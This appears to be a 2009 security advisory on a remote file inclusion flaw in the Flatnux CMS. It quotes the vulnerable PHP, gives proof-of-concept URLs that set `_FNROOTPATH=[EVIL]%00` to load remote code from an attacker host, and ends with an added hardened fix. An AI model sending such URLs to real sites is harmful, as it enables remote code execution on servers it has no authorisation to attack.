SECURITYVULNS:DOC:21295
Feb 05, 2009

flatnux Flatnux-2009-01-27 Remote File Include

vulners.com

@ flatnux Flatnux-2009-01-27 RFI
dependencies P

  • Alfons Luja
  • 2009
  • grts : All friends

VULN :
+++ include/theme.php

<?php
if (eregi("theme.php", $_SERVER['PHP_SELF']))
    die(); // 0 <-- I don't give a fuck

global $theme, $_FNROOTPATH, $lang;   // <-- 1
global $forumback, $forumborder;
$_FN['table_background'] = &$forumback;
$_FN['table_border']     = &$forumborder;

if ($forumback == "" && $forumborder == "") {
    $forumback   = "ffffff";
    $forumborder = "000000";
}
require_once($_FNROOTPATH . "themes/$theme/theme.php");

/*------- Functions that theme.php may redefine --------------*/
//......

+++ /flatnux.php line 116:

// $_FNROOTPATH still has no value here
include_once "./include/theme.php";   // -- 2

+++ /filemanager.php

include "./include/flatnux.php"; // -- RFI

p0c:
http://localhost/~flatnux/index.php?_FNROOTPATH=[EVIL]%00
http://localhost/~flatnux/filemanager.php?mod=&op=&dir=/&opmod=newfile&filemanager_editor=tfuj_stary&_FNROOTPATH=[EVIL]%00
… etc …
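As an added illustration (not Flatnux code), a hardened replacement for the require_once at the end of the theme.php fragment above: the root path is derived from the file's own location instead of the `$_FNROOTPATH` global that the PoC sets from the query string, and the theme name is allowlisted and containment-checked before anything is included. The `$_FN['theme']` config key and the directory layout are assumptions.

```php
<?php
// Added example, not Flatnux code: a hardened replacement for the
// require_once at the end of include/theme.php. The root path comes from
// this file's own location instead of a global the request can overwrite,
// and the theme name is allowlisted and containment-checked first.
declare(strict_types=1);

// Assumption: same layout as the advisory, so the root is one level above include/.
define('FN_ROOT', realpath(__DIR__ . '/..') . DIRECTORY_SEPARATOR);

/** Return the absolute theme.php path for $theme, or null if it is unsafe or absent. */
function resolveThemeFile(string $theme): ?string
{
    // Allowlist a bare directory name: no separators, dots or NUL bytes
    // (the %00 truncation used in the PoC is rejected here).
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $theme)) {
        return null;
    }
    $themesDir = realpath(FN_ROOT . 'themes');
    if ($themesDir === false) {
        return null;
    }
    $candidate = realpath($themesDir . DIRECTORY_SEPARATOR . $theme
                          . DIRECTORY_SEPARATOR . 'theme.php');
    if ($candidate === false) {
        return null; // theme directory or file does not exist
    }
    // Containment: the resolved path must stay below themes/ (defeats symlink escapes).
    $prefix = $themesDir . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Assumption: the configured theme lives in $_FN['theme']; it is never read
// from $_GET, $_POST or register_globals-populated variables.
$themeName = (isset($_FN['theme']) && is_string($_FN['theme'])) ? $_FN['theme'] : 'default';
$themeFile = resolveThemeFile($themeName);
if ($themeFile === null) {
    // Fail closed instead of falling back to an attacker-influenced path.
    error_log('flatnux: refused theme "' . $themeName . '"');
    http_response_code(500);
    exit;
}
require_once $themeFile;
```

Disabling `register_globals` and `allow_url_include` in php.ini removes the remaining attack surface that the PoC relies on, independent of this code change.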

http://www.wrzuta.pl/audio/xLyg0zckZS/--
#EOF lol